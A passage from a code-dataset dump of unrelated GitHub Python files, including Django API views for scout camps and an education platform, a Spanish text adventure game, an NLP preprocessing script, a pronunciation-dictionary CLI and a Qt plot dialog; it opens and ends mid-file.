swagger_auto_schema\n\n\nfrom apps.visums.models import CampVisum\nfrom apps.visums.filters import CampVisumFilter\nfrom apps.visums.services import CampVisumService\nfrom apps.locations.models import CampLocation\nfrom apps.locations.serializers import CampLocationMinimalSerializer\nfrom apps.camps.serializers import CampMinimalSerializer\nfrom apps.visums.models import LinkedCategory\nfrom apps.visums.models import LinkedSubCategory\nfrom apps.visums.models import LinkedLocationCheck\nfrom apps.camps.models.camp_year import CampYear\n\nfrom scouts_auth.scouts.permissions import ScoutsFunctionPermissions\nfrom scouts_auth.groupadmin.serializers.scouts_group_serializer import (\n ScoutsGroupSerializer,\n)\nfrom scouts_auth.groupadmin.models.scouts_group import ScoutsGroup\nfrom scouts_auth.groupadmin.models.scouts_user import ScoutsUser\n\n# LOGGING\nimport logging\nfrom scouts_auth.inuits.logging import InuitsLogger\n\n\nlogger: InuitsLogger = logging.getLogger(__name__)\n\n\nclass CampVisumLocationViewSet(viewsets.GenericViewSet):\n \"\"\"\n A viewset for viewing camp location.\n \"\"\"\n\n serializer_class = CampLocationMinimalSerializer\n queryset = CampVisum.objects.all()\n permission_classes = (ScoutsFunctionPermissions,)\n filter_backends = [filters.DjangoFilterBackend]\n filterset_class = CampVisumFilter\n\n camp_visum_service = CampVisumService()\n\n @swagger_auto_schema(responses={status.HTTP_200_OK: CampLocationMinimalSerializer})\n def list(self, request):\n # HACKETY HACK\n # This should probably be handled by a rest call when changing groups in the frontend,\n # but adding it here avoids the need for changes to the frontend\n\n user: ScoutsUser = request.user\n group_admin_id = self.request.GET.get(\"group\", None)\n year: int = self.request.GET.get(\"year\")\n year: CampYear = CampYear.objects.get(year=year)\n\n if group_admin_id == \"any\":\n campvisums = set(CampVisum.objects.all().filter(year=year))\n else:\n campvisums = set(\n CampVisum.objects.all().filter(group=group_admin_id, year=year)\n )\n\n locations = list()\n date_in_range = True\n\n if request.query_params.get(\"start_date\"):\n start_date = datetime.strptime(\n request.query_params.get(\"start_date\"),\n \"%Y-%m-%d\",\n ).date()\n else:\n start_date = None\n\n if request.query_params.get(\"end_date\"):\n end_date = datetime.strptime(\n request.query_params.get(\"end_date\"),\n \"%Y-%m-%d\",\n ).date()\n else:\n end_date = None\n\n for campvisum in campvisums:\n group: ScoutsGroup = user.get_scouts_group(campvisum.group)\n if start_date and end_date:\n date_in_range = False\n if (campvisum.start_date and campvisum.start_date >= start_date) and (\n campvisum.end_date and campvisum.end_date <= end_date\n ):\n date_in_range = True\n elif start_date:\n date_in_range = False\n if campvisum.start_date and campvisum.start_date >= start_date:\n date_in_range = True\n elif end_date:\n date_in_range = False\n if campvisum.end_date and campvisum.end_date <= end_date:\n date_in_range = True\n\n if date_in_range:\n location = campvisum.location\n if location:\n location[\"camp\"] = CampMinimalSerializer(\n campvisum, many=False\n ).data\n location[\"camp\"][\"group\"] = ScoutsGroupSerializer(\n group, many=False\n ).data\n locations.append(location)\n return Response(locations)\n","repo_name":"ScoutsGidsenVL/kampvisum-backend","sub_path":"scouts_kampvisum_api/apps/visums/views/visum_location_views.py","file_name":"visum_location_views.py","file_ext":"py","file_size_in_byte":4106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72129282724","text":"import random\nimport time\ndef mostrarIntro(): # def crea una funcion\n print('Estás en una tierra llena de dragones. Frente a tí')\n print('hay dos cuevas. En una de ellas, el dragón es generoso y')\n print('amigable y compartirá su tesoro contigo. El otro dragón')\n print('es codicioso y está hambriento, y te devorará inmediatamente.')\n print()\ndef elegirCueva(): #funcion pregunta que cueva elige\n cueva = '' #declara variable guardara la eleccion\n while cueva != '1' and cueva != '2': #true and true\n print(\"¿Elige una cueva? (1 ó 2)\")\n cueva = input()\n return cueva\ndef explorarCueva(cuevaElegida): #mostrando resultados del juego\n time.sleep(2)\n print('Es oscura y espeluznante...')\n time.sleep(2)\n print('¡El dragon aparece súbitamente frente a tí! Abre sus fauces y...')\n print()\n time.sleep(2)\n cuevaAmigable = random.randint(1,2) #aleatoriamente selecciona una de las dos opciones\n if cuevaElegida == str(cuevaAmigable): #compara la eleccion con la cueva amigable\n print(\"¡Te regala un tesoro!\")\n else:\n print(\"¡Te avienta fuego por la boca!\")\njugarDeNuevo = \"si\"\nwhile jugarDeNuevo == \"si\" or jugarDeNuevo == \"s\": #pregunta si deseas volver a correr el código\n mostrarIntro()\n numeroDeCueva = elegirCueva()\n explorarCueva(numeroDeCueva)\n print(\"¿Quieres jugar de nuevo? (si ó no)\")\n jugarDeNuevo = input()","repo_name":"ericsolis8/curso_Python","sub_path":"dragon.py","file_name":"dragon.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"70338437925","text":"import pandas as pd\nimport string\nimport textract\nimport requests\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk import pos_tag\nfrom nltk.stem import PorterStemmer\n\ndata = pd.read_csv('federal_sample_20170408 - federal_sample_20170408.csv')\n\ndata = data[data['new_misconduct_determination'].notnull()]\ndata['new_misconduct_determination'] = data['new_misconduct_determination'].str.strip()\ndata['new_misconduct_determination'] = data['new_misconduct_determination'].str.lower()\ndata = data.replace('na', 'no')\n\nif len(set(data['new_misconduct_determination'])) == 2:\n \n data = data[['txt_link', 'new_misconduct_determination']]\n data = data.replace('yes', 1)\n data = data.replace('no', 0)\n \n nltk_stopwords = stopwords.words('english')\n custom_stopwords = set(w.rstrip() for w in open('stopwords.txt'))\n stopwords = custom_stopwords.union(nltk_stopwords)\n \n data_to_export = pd.DataFrame(columns=['case_text', 'misconduct'])\n \n def preprocessing(text):\n \n text2 = ' '.join(''.join([' ' if ch in string.punctuation else ch for ch in text]).split())\n tokens = [word for sent in nltk.sent_tokenize(text2) for word in nltk.word_tokenize(sent)]\n tokens = [word.lower() for word in tokens]\n tokens = [token for token in tokens if token not in stopwords]\n tokens = [word for word in tokens if len(word) >= 3]\n \n # stemmer = PorterStemmer()\n # tokens = [stemmer.stem(word) for word in tokens]\n \n tokens = [t for t in tokens if not any(c.isdigit() for c in t)]\n tagged_corpus = pos_tag(tokens)\n \n Noun_tags = ['NN','NNP','NNPS','NNS']\n Verb_tags = ['VB','VBD','VBG','VBN','VBP','VBZ']\n \n lemmatizer = WordNetLemmatizer()\n \n def prat_lemmatize(token,tag):\n if tag in Noun_tags: return lemmatizer.lemmatize(token, 'n')\n elif tag in Verb_tags: return lemmatizer.lemmatize(token, 'v')\n else: return lemmatizer.lemmatize(token,'n')\n \n pre_proc_text = ' '.join([prat_lemmatize(token,tag) for token,tag in tagged_corpus])\n \n return pre_proc_text\n\n for i, row in data.iterrows():\n url = row['txt_link']\n if \"https://drive.google.com\" in url:\n file_id = url[41: -18]\n url = 'https://drive.google.com/a/bu.edu/uc?id=' + file_id +'&export=download'\n res = requests.get(url)\n open(file_id + '.rtf', 'wb').write(res.content)\n text = textract.process(file_id + '.rtf')\n # call to preprocessing function can be deleted to have original text\n data_to_export = data_to_export.append({'case_text': preprocessing(text.decode()), 'misconduct': row['new_misconduct_determination']}, ignore_index=True)\n else:\n res = requests.get(url)\n data_to_export = data_to_export.append({'case_text': preprocessing(res.text), 'misconduct': row['new_misconduct_determination']}, ignore_index=True)\n\n data_to_export.to_csv('preprocessed_data.csv', index=False)","repo_name":"rcallah/Spark-Project","sub_path":"spark_code/neural_net/preprocessing/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":3124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4210938053","text":"from argparse import ArgumentParser, Namespace\nfrom logging import Logger\nfrom pathlib import Path\nfrom tempfile import gettempdir\n\nfrom pronunciation_dictionary import (DeserializationOptions, MultiprocessingOptions,\n SerializationOptions)\n\nfrom pronunciation_dictionary_utils import remove_symbols_from_pronunciations\nfrom pronunciation_dictionary_utils_cli.argparse_helper import (ConvertToOrderedSetAction,\n add_io_group, add_mp_group,\n get_optional, parse_existing_file,\n parse_non_empty_or_whitespace,\n parse_path)\nfrom pronunciation_dictionary_utils_cli.io import try_load_dict, try_save_dict\n\nDEFAULT_EMPTY_WEIGHT = 1\n\n\ndef get_pronunciations_remove_symbols_parser(parser: ArgumentParser):\n default_removed_out = Path(gettempdir()) / \"removed-words.txt\"\n parser.description = \"Remove symbols from pronunciations.\"\n parser.add_argument(\"dictionary\", metavar='DICTIONARY',\n type=parse_existing_file, help=\"dictionary file\")\n parser.add_argument(\"symbols\", type=str, metavar='SYMBOL', nargs='+',\n help=\"remove these symbols from the pronunciations\", action=ConvertToOrderedSetAction)\n parser.add_argument(\"-m\", \"--mode\", type=str, choices=[\"all\", \"start\", \"end\", \"both\"], metavar=\"MODE\",\n help=\"mode to remove the symbols: all = on all locations; start = only from start; end = only from end; both = start + end\", default=\"both\")\n parser.add_argument(\"-k\", \"--keep-empty\", action=\"store_true\",\n help=\"if a pronunciation will be empty after removal, keep the corresponding word in the dictionary and assign the value of empty-symbol\")\n parser.add_argument(\"-es\", \"--empty-symbol\", metavar=\"SYMBOL\", type=get_optional(parse_non_empty_or_whitespace),\n help=\"if keep-empty: assign this symbol to the word where no pronunciations result because of the symbol removal\", default=\"sil\")\n parser.add_argument(\"-ro\", \"--removed-out\", metavar=\"PATH\", type=get_optional(parse_path),\n help=\"write removed words (i.e., words that had no pronunciation anymore) to this file\", default=default_removed_out)\n add_io_group(parser)\n add_mp_group(parser)\n return remove_symbols_from_pronunciations_ns\n\n\ndef remove_symbols_from_pronunciations_ns(ns: Namespace, logger: Logger, flogger: Logger) -> bool:\n if ns.keep_empty and ns.empty_symbol is None:\n logger.error(\"An empty symbol needs to be supplied if keep-empty is true!\")\n return False\n\n lp_options = DeserializationOptions(\n ns.consider_comments, ns.consider_numbers, ns.consider_pronunciation_comments, ns.consider_weights)\n mp_options = MultiprocessingOptions(ns.n_jobs, ns.maxtasksperchild, ns.chunksize)\n\n s_options = SerializationOptions(ns.parts_sep, ns.consider_numbers, ns.consider_weights)\n\n dictionary_instance = try_load_dict(ns.dictionary, ns.encoding, lp_options, mp_options, logger)\n if dictionary_instance is None:\n return False\n\n removed_words, changed_counter = remove_symbols_from_pronunciations(\n dictionary_instance, ns.symbols, ns.mode, ns.keep_empty, ns.empty_symbol, mp_options)\n\n if changed_counter == 0:\n logger.info(\"Didn't change anything.\")\n return True\n\n logger.info(f\"Changed pronunciations of {changed_counter} word(s).\")\n\n success = try_save_dict(dictionary_instance, ns.dictionary, ns.encoding, s_options, logger)\n if not success:\n return False\n\n logger.info(f\"Written dictionary to: \\\"{ns.dictionary.absolute()}\\\"\")\n\n if len(removed_words) > 0:\n logger.warning(f\"{len(removed_words)} words were removed.\")\n if ns.removed_out is not None:\n content = \"\\n\".join(removed_words)\n ns.removed_out.parent.mkdir(parents=True, exist_ok=True)\n try:\n ns.removed_out.write_text(content, \"UTF-8\")\n except Exception as ex:\n logger.debug(ex)\n logger.error(\"Removed words output couldn't be created!\")\n return False\n logger.info(f\"Written removed words to: \\\"{ns.removed_out.absolute()}\\\".\")\n else:\n logger.info(\"No words were removed.\")\n return True\n","repo_name":"stefantaubert/pronunciation-dictionary-utils","sub_path":"src/pronunciation_dictionary_utils_cli/pronunciations_remove_symbols.py","file_name":"pronunciations_remove_symbols.py","file_ext":"py","file_size_in_byte":4336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4364251999","text":"from collections import deque\nimport numpy as np\n\nclass bfs_node(object):\n def __init__(self, idx, links):\n self.idx = idx\n self.links = links\n self.depth = None\n\ndef forfor(a):\n return [item for sublist in a for item in sublist]\n\ndef get_bfs_order(edges, n_nodes):\n edges = list(zip(*edges))\n bfs_links = [[] for _ in range(n_nodes)]\n for i in range(n_nodes):\n for link_parent, link_son in edges:\n if link_parent == i:\n bfs_links[i].append(link_son)\n elif link_son == i:\n bfs_links[i].append(link_parent)\n bfs_nodes = [bfs_node(idx, links) for idx, links in enumerate(bfs_links)]\n queue = deque([bfs_nodes[0]])\n visited = set([bfs_nodes[0].idx])\n bfs_nodes[0].depth = 0\n order1,order2 = [],[]\n bfs_order = [0,]\n while len(queue) > 0:\n x = queue.popleft()\n for y in x.links:\n y = bfs_nodes[y]\n if y.idx not in visited:\n queue.append(y)\n visited.add(y.idx)\n y.depth = x.depth + 1\n if y.depth > len(order1):\n order1.append([])\n order2.append([])\n order1[y.depth-1].append( (x.idx, y.idx) )\n order2[y.depth-1].append( (y.idx, x.idx) )\n bfs_order.append(y.idx)\n return bfs_order, forfor(order1)\n","repo_name":"qiangbo1222/HierDiff","sub_path":"generation/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"52"} +{"seq_id":"41468091628","text":"from PySide6 import QtCore\nfrom PySide6 import QtWidgets\n\nfrom sas.qtgui.Plotting.PlotUtilities import COLORS, COLORS_LETTER, WEIGHTS, FONTS\nfrom sas.qtgui.Plotting.UI.PlotLabelPropertiesUI import Ui_PlotLabelPropertiesUI\n\n\nclass PlotLabelPropertyHolder():\n def __init__(self, font=None, color=None, weight=None, size=None, text=\"\",):\n self.__properties = {}\n self.__properties['font'] = font\n self.__properties['color'] = color\n self.__properties['weight'] = weight\n self.__properties['size'] = size\n self.__properties['text'] = text\n\n @property\n def font(self):\n return self.__properties['font']\n\n @font.setter\n def font(self, value):\n self.__properties['font'] = value\n\n @property\n def color(self):\n return self.__properties['color']\n\n @color.setter\n def color(self, value):\n self.__properties['color'] = value\n\n @property\n def weight(self):\n return self.__properties['weight']\n\n @weight.setter\n def weight(self, value):\n self.__properties['weight'] = value\n\n @property\n def size(self):\n return self.__properties['size']\n\n @size.setter\n def size(self, value):\n self.__properties['size'] = value\n\n @property\n def text(self):\n return self.__properties['text']\n\n @text.setter\n def text(self, value):\n self.__properties['text'] = value\n\n\nclass PlotLabelProperties(QtWidgets.QDialog, Ui_PlotLabelPropertiesUI):\n \"\"\" Dialog for modification of plot label properties \"\"\"\n def __init__(self,\n parent=None,\n x_props={},\n y_props={}):\n\n super(PlotLabelProperties, self).__init__(parent)\n self.setupUi(self)\n # disable the context help icon\n self.setWindowFlags(self.windowFlags() & ~QtCore.Qt.WindowContextHelpButtonHint)\n\n self.setFixedSize(self.minimumSizeHint())\n\n self.custom_color = False\n self.custom_colory = False\n\n self._weight = x_props.weight\n self._color = x_props.color\n self._text = x_props.text\n self._size = x_props.size\n self._family = x_props.font\n\n self._weighty = y_props.weight\n self._colory = y_props.color\n self._texty = y_props.text\n self._sizey = y_props.size\n self._familyy = y_props.font\n\n # Fill out the color comboboxes\n self.cbColor.addItems(list(COLORS.keys())[:-1])\n self.cbColor_y.addItems(list(COLORS.keys())[:-1])\n # data1d.custom_color can now be a simple integer,\n # specifying COLORS dict index or a string containing\n # the hex RGB value, e.g. #00FF00\n if isinstance(self._color, int):\n self.cbColor.setCurrentIndex(self._color)\n elif self._color in COLORS.keys():\n self.cbColor.setCurrentIndex(list(COLORS.keys()).index(self._color))\n elif self._color in COLORS.values():\n self.cbColor.setCurrentIndex(list(COLORS.values()).index(self._color))\n elif self._color in COLORS_LETTER.keys():\n self.cbColor.setCurrentIndex(list(COLORS_LETTER.keys()).index(self._color))\n else:\n # Need the Custom entry here. \"Custom\" is always last.\n self.cbColor.addItems([list(COLORS.keys())[-1]])\n self.cbColor.setCurrentIndex(list(COLORS.keys()).index(\"Custom\"))\n self.custom_color = True\n\n if isinstance(self._colory, int):\n self.cbColor_y.setCurrentIndex(self._colory)\n elif self._colory in COLORS.keys():\n self.cbColor_y.setCurrentIndex(list(COLORS.keys()).index(self._colory))\n elif self._colory in COLORS.values():\n self.cbColor_y.setCurrentIndex(list(COLORS.values()).index(self._colory))\n elif self._colory in COLORS_LETTER.keys():\n self.cbColor_y.setCurrentIndex(list(COLORS_LETTER.keys()).index(self._colory))\n else:\n # Need the Custom entry here. \"Custom\" is always last.\n self.cbColor_y.addItems([list(COLORS.keys())[-1]])\n self.cbColor_y.setCurrentIndex(list(COLORS.keys()).index(\"Custom\"))\n self.custom_colory = True\n\n # Fill out the weight combobox\n self.cbWeight.addItems(WEIGHTS)\n try:\n self.cbWeight.setCurrentIndex(self._weight)\n except TypeError:\n marker_index = self.cbWeight.findText(self._weight)\n self.cbWeight.setCurrentIndex(marker_index)\n\n self.cbWeight_y.addItems(WEIGHTS)\n try:\n self.cbWeight_y.setCurrentIndex(self._weighty)\n except TypeError:\n marker_index = self.cbWeight_y.findText(self._weighty)\n self.cbWeight_y.setCurrentIndex(marker_index)\n\n # Fill out the font combobox\n self.cbFont.addItems(FONTS)\n try:\n self.cbFont.setCurrentIndex(self._family)\n except TypeError:\n marker_index = self.cbFont.findText(self._family)\n self.cbFont.setCurrentIndex(marker_index)\n\n self.cbFont_y.addItems(FONTS)\n try:\n self.cbFont_y.setCurrentIndex(self._familyy)\n except TypeError:\n marker_index = self.cbFont_y.findText(self._familyy)\n self.cbFont_y.setCurrentIndex(marker_index)\n\n\n self.txtLegend.setText(self._text)\n self.txtLegend_y.setText(self._texty)\n\n # Size\n self.cbSize.setValue(self._size)\n self.cbSize_y.setValue(self._sizey)\n\n # Connect slots\n self.cmdCustom.clicked.connect(self.onColorChange)\n self.cmdCustom_y.clicked.connect(self.onColorChange_y)\n self.cbColor.currentIndexChanged.connect(self.onColorIndexChange)\n self.cbColor_y.currentIndexChanged.connect(self.onColorIndexChange_y)\n\n def text_x(self):\n ''' return current legend text for x-axis '''\n return str(self.txtLegend.text())\n\n def text_y(self):\n ''' return current legend text for y-axis '''\n return str(self.txtLegend_y.text())\n\n def apply_to_ticks_x(self):\n ''' return status of the \"Apply to ticks\" checkbox for x-axis '''\n return self.chkTicks.isChecked()\n\n def apply_to_ticks_y(self):\n ''' return status of the \"Apply to ticks\" checkbox for y-axis '''\n return self.chkTicks_y.isChecked()\n\n def fx(self):\n ''' return font parameters for x-axis '''\n if self.custom_color:\n color = self._color\n else:\n color = self.cbColor.currentText()\n font = {'family': self.cbFont.currentText(),\n 'color': color,\n 'weight': self.cbWeight.currentText(),\n 'size': self.cbSize.value(),\n }\n return font\n\n def fy(self):\n ''' return font parameters for y-axis '''\n if self.custom_colory:\n color = self._colory\n else:\n color = self.cbColor_y.currentText()\n font = {'family': self.cbFont_y.currentText(),\n 'color': color,\n 'weight': self.cbWeight_y.currentText(),\n 'size': self.cbSize_y.value(),\n }\n return font\n\n def onColorChange(self):\n \"\"\"\n Pop up the standard Qt color change dialog\n \"\"\"\n # Pick up the chosen color\n proposed_color = QtWidgets.QColorDialog.getColor(parent=self)\n # Update the text control\n if proposed_color.isValid():\n # Block currentIndexChanged\n self.cbColor.blockSignals(True)\n # Add Custom to the color combo box\n self.cbColor.addItems([\"Custom\"])\n self.cbColor.setCurrentIndex(list(COLORS.keys()).index(\"Custom\"))\n # unblock currentIndexChanged\n self.cbColor.blockSignals(False)\n # Save the color as #RRGGBB\n self.custom_color = True\n self._color = str(proposed_color.name())\n\n def onColorChange_y(self):\n \"\"\"\n Pop up the standard Qt color change dialog\n \"\"\"\n # Pick up the chosen color\n proposed_color = QtWidgets.QColorDialog.getColor(parent=self)\n # Update the text control\n if proposed_color.isValid():\n # Block currentIndexChanged\n self.cbColor_y.blockSignals(True)\n # Add Custom to the color combo box\n self.cbColor_y.addItems([\"Custom\"])\n self.cbColor_y.setCurrentIndex(list(COLORS.keys()).index(\"Custom\"))\n # unblock currentIndexChanged\n self.cbColor_y.blockSignals(False)\n # Save the color as #RRGGBB\n self.custom_colory = True\n self._colory = str(proposed_color.name())\n\n def onColorIndexChange(self):\n \"\"\"\n Dynamically add/remove \"Custom\" color index\n \"\"\"\n # Changed index - assure Custom is deleted\n custom_index = self.cbColor.findText(\"Custom\")\n self.custom_color = False\n if custom_index > -1:\n self.cbColor.removeItem(custom_index)\n\n def onColorIndexChange_y(self):\n \"\"\"\n Dynamically add/remove \"Custom\" color index\n \"\"\"\n # Changed index - assure Custom is deleted\n custom_index = self.cbColor_y.findText(\"Custom\")\n self.custom_colory = False\n if custom_index > -1:\n self.cbColor_y.removeItem(custom_index)\n","repo_name":"SasView/sasview","sub_path":"src/sas/qtgui/Plotting/PlotLabelProperties.py","file_name":"PlotLabelProperties.py","file_ext":"py","file_size_in_byte":9338,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"52"} +{"seq_id":"25422755418","text":"from django.db.models import Q\n\nfrom rest_framework import status\nfrom rest_framework import serializers\nfrom rest_framework.views import APIView\nfrom rest_framework.generics import ListAPIView, get_object_or_404\nfrom rest_framework.response import Response\n\nfrom odin.apis.mixins import ServiceExceptionHandlerMixin\nfrom odin.common.utils import inline_serializer\n\nfrom odin.education.models import (\n Course,\n Student,\n Teacher,\n Week,\n ProgrammingLanguage,\n)\n\nfrom odin.education.services import (\n create_included_task_with_test,\n get_gradable_tasks_for_course,\n)\n\nfrom odin.education.apis.permissions import (\n CourseAuthenticationMixin,\n TeacherCourseAuthenticationMixin,\n CourseDetailAuthenticationMixin,\n)\n\n\nclass StudentCoursesApi(\n CourseAuthenticationMixin,\n ServiceExceptionHandlerMixin,\n ListAPIView\n):\n\n class Serializer(serializers.ModelSerializer):\n students_count = serializers.SerializerMethodField()\n description = serializers.CharField(source='description.verbose')\n\n class Meta:\n model = Course\n fields = ('id',\n 'name',\n 'start_date',\n 'end_date',\n 'logo',\n 'slug_url',\n 'description',\n 'students_count')\n\n def get_students_count(self, obj):\n return obj.students.filter(is_active=True).count()\n\n serializer_class = Serializer\n\n def get_queryset(self):\n user = self.request.user\n\n teacher = user.downcast(Teacher)\n student = user.downcast(Student)\n\n return Course.objects.filter(\n Q(teachers__in=[teacher]) | Q(students__in=[student])\n ).distinct()\n\n\nclass CourseDetailApi(\n ServiceExceptionHandlerMixin,\n CourseAuthenticationMixin,\n CourseDetailAuthenticationMixin,\n APIView\n):\n\n class CourseSerializer(serializers.ModelSerializer):\n problems = serializers.SerializerMethodField()\n languages = serializers.SerializerMethodField()\n weeks = serializers.SerializerMethodField()\n\n class Meta:\n model = Course\n fields = (\n 'id',\n 'name',\n 'start_date',\n 'end_date',\n 'logo',\n 'slug_url',\n 'problems',\n 'weeks',\n 'languages'\n )\n\n def get_problems(self, obj):\n return [\n {\n 'id': task.id,\n 'name': task.name,\n 'gradable': task.gradable,\n 'week': {\n 'id': task.week.id,\n 'number': task.week.number\n },\n 'description': task.description,\n 'last_solution': task.last_solution and {\n 'id': task.last_solution.id,\n 'status': task.last_solution.verbose_status,\n 'code': task.last_solution.code\n } or None\n } for task in obj.tasks\n ]\n\n def get_languages(self, obj):\n return [\n {\n 'id': language.id,\n 'name': language.name,\n } for language in ProgrammingLanguage.objects.all()\n ]\n\n def get_weeks(self, obj):\n return [\n {\n 'id': week.id,\n 'number': week.number,\n } for week in obj.weeks.all()\n ]\n\n def get_queryset(self):\n return Course.objects.prefetch_related('weeks__included_tasks')\n\n def get(self, request, course_id):\n course = get_object_or_404(self.get_queryset(), pk=course_id)\n user = self.request.user\n\n course.tasks = get_gradable_tasks_for_course(course=course, user=user)\n\n return Response(self.CourseSerializer(instance=course).data)\n\n\nclass TeacherCourseDetailApi(TeacherCourseAuthenticationMixin, APIView):\n # Pending deprecation, rebase FE functionality to CourseDetailApi only\n class Serializer(serializers.ModelSerializer):\n\n weeks = serializers.SerializerMethodField()\n languages = serializers.SerializerMethodField()\n\n class Meta:\n model = Course\n fields = (\n 'id',\n 'name',\n 'start_date',\n 'end_date',\n 'logo',\n 'slug_url',\n 'languages',\n 'weeks',\n )\n\n def get_weeks(self, obj):\n return [\n {\n 'id': week.id,\n 'number': week.number,\n 'tasks': [\n {\n 'id': task.id,\n 'name': task.name,\n 'gradable': task.gradable,\n 'description': task.description,\n } for task in week.included_tasks.all()\n ]\n } for week in obj.weeks.all()\n ]\n\n def get_languages(self, obj):\n return [\n {\n 'id': language.id,\n 'name': language.name,\n } for language in ProgrammingLanguage.objects.all()\n ]\n\n def get(self, request, course_id):\n course = get_object_or_404(Course, pk=course_id)\n\n return Response(self.Serializer(instance=course).data)\n\n\nclass CreateTaskApi(\n ServiceExceptionHandlerMixin,\n TeacherCourseAuthenticationMixin,\n APIView\n):\n\n class Serializer(serializers.Serializer):\n course = serializers.PrimaryKeyRelatedField(\n queryset=Course.objects.all(),\n error_messages={\n 'does_not_exist':\n ('Course does not exist')\n }\n )\n name = serializers.CharField()\n code = serializers.CharField()\n requirements = serializers.CharField(required=False)\n description_url = serializers.URLField()\n gradable = serializers.BooleanField()\n language = serializers.PrimaryKeyRelatedField(\n queryset=ProgrammingLanguage.objects.all(),\n error_messages={\n 'does_not_exists':\n ('Programming Language does not exist')\n }\n )\n week = serializers.PrimaryKeyRelatedField(\n queryset=Week.objects.all(),\n error_messages={\n 'does_not_exist':\n ('Week does not exist')\n }\n )\n\n def post(self, request, course_id):\n data = request.data\n data['course'] = course_id\n serializer = self.Serializer(data=data)\n serializer.is_valid(raise_exception=True)\n\n task = create_included_task_with_test(**serializer.validated_data)\n\n data = {\n 'task_id': task.id,\n 'task_name': task.name,\n 'gradable': task.gradable,\n }\n\n return Response(data=data, status=status.HTTP_201_CREATED)\n\n\nclass TeacherOnlyCourseDetailApi(\n ServiceExceptionHandlerMixin,\n TeacherCourseAuthenticationMixin,\n APIView,\n):\n\n class Serializer(serializers.ModelSerializer):\n languages = serializers.SerializerMethodField()\n students_count = serializers.IntegerField(source='students.count')\n students = inline_serializer(many=True, fields={\n 'id': serializers.IntegerField(),\n 'user_id': serializers.IntegerField(source='user.id'),\n 'full_name': serializers.CharField(source='user.name'),\n 'solution_status_summary': inline_serializer(\n source='user.get_solution_summary', fields={\n 'OK': serializers.IntegerField(),\n 'TOTAL': serializers.IntegerField(),\n 'completed_tasks': inline_serializer(\n many=True,\n fields={\n 'task_id': serializers.IntegerField(),\n 'name': serializers.CharField(),\n 'solution_id': serializers.IntegerField(),\n 'solution_code': serializers.CharField(),\n 'test_result': serializers.DictField(),\n }\n )\n }),\n 'avatar': serializers.CharField(source='user.get_avatar'),\n })\n\n weeks = inline_serializer(many=True, fields={\n 'id': serializers.IntegerField(),\n 'number': serializers.IntegerField(),\n })\n\n def get_languages(self, obj):\n\n languages = inline_serializer(\n instance=ProgrammingLanguage.objects.all(),\n many=True,\n fields={\n 'id': serializers.IntegerField(),\n 'name': serializers.CharField()\n },\n )\n return languages.data\n\n class Meta:\n model = Course\n fields = (\n 'id',\n 'name',\n 'start_date',\n 'end_date',\n 'logo',\n 'slug_url',\n 'languages',\n 'weeks',\n 'students_count',\n 'students'\n )\n\n def get_queryset(self):\n return Course.objects.prefetch_related('students__user__solutions')\n\n def get(self, request, course_id):\n\n course = get_object_or_404(self.get_queryset(), pk=course_id)\n\n return Response(self.Serializer(instance=course).data)\n","repo_name":"prabhatpankaj/Odin","sub_path":"odin/education/apis/courses.py","file_name":"courses.py","file_ext":"py","file_size_in_byte":9722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37878071516","text":"import inspect\r\nimport tempfile\r\nimport traceback\r\n\r\nfrom PyQt5.uic import loadUi\r\nfrom qgis.core import QgsPalettedRasterRenderer\r\nfrom qgis.core import *\r\nfrom qgis.gui import *\r\nfrom qgis.PyQt.QtCore import *\r\nfrom qgis.PyQt.QtGui import *\r\nfrom qgis.PyQt.QtWidgets import *\r\n\r\nfrom enmapbox.qgispluginsupport.qps.speclib.core import is_spectral_library\r\nfrom _classic.hubdsm.core.color import Color as HubdsmColor\r\nfrom _classic.hubdsm.core.gdalraster import GdalRaster\r\nfrom _classic.hubdsm.core.qgsvectorclassificationscheme import QgsVectorClassificationScheme\r\nfrom _classic.hubdsm.processing.savelayerasclassification import saveLayerAsClassification\r\nfrom _classic.hubflow.core import *\r\nfrom _classic.classificationapp.script import classificationWorkflow, ProgressBar\r\n\r\npathUi = join(dirname(__file__), 'ui')\r\n\r\n\r\nclass ClassificationWorkflowApp(QMainWindow):\r\n uiTrainingType_: QComboBox\r\n uiType0Raster_: QgsMapLayerComboBox\r\n uiType0Classification_: QgsMapLayerComboBox\r\n uiType1Raster_: QgsMapLayerComboBox\r\n uiType1VectorClassification_: QgsMapLayerComboBox\r\n uiType1Dialog_: QToolButton\r\n uiType2Library_: QgsMapLayerComboBox\r\n\r\n def __init__(self, parent=None):\r\n QMainWindow.__init__(self, parent)\r\n loadUi(join(pathUi, 'main.ui'), self)\r\n self.uiInfo_ = QLabel()\r\n self.statusBar().addWidget(self.uiInfo_, 1)\r\n\r\n self.initMaps()\r\n self.initClassifier()\r\n self.initOutputs()\r\n\r\n self.uiTrainingType_.currentIndexChanged.connect(self.clearTrainingData)\r\n self.uiType0Raster_.layerChanged.connect(self.initClasses)\r\n self.uiType0Classification_.layerChanged.connect(self.initClasses)\r\n self.uiType1Dialog_.clicked.connect(self.openType1Dialog)\r\n self.uiType1Raster_.layerChanged.connect(self.initClasses)\r\n self.uiType1VectorClassification_.layerChanged.connect(self.initClasses)\r\n self.uiType2Library_.layerChanged.connect(self.initClasses)\r\n\r\n self.uiSampleSizePercent_.valueChanged.connect(self.updateSpinboxes)\r\n self.uiSampleSizePixel_.valueChanged.connect(self.updateSpinboxes)\r\n self.uiApply_.clicked.connect(self.updateSpinboxes)\r\n\r\n self.uiExecute_.clicked.connect(self.execute)\r\n\r\n self.spinboxes = None\r\n\r\n def openType1Dialog(self):\r\n layer = self.uiType1VectorClassification_.currentLayer()\r\n if layer is not None:\r\n 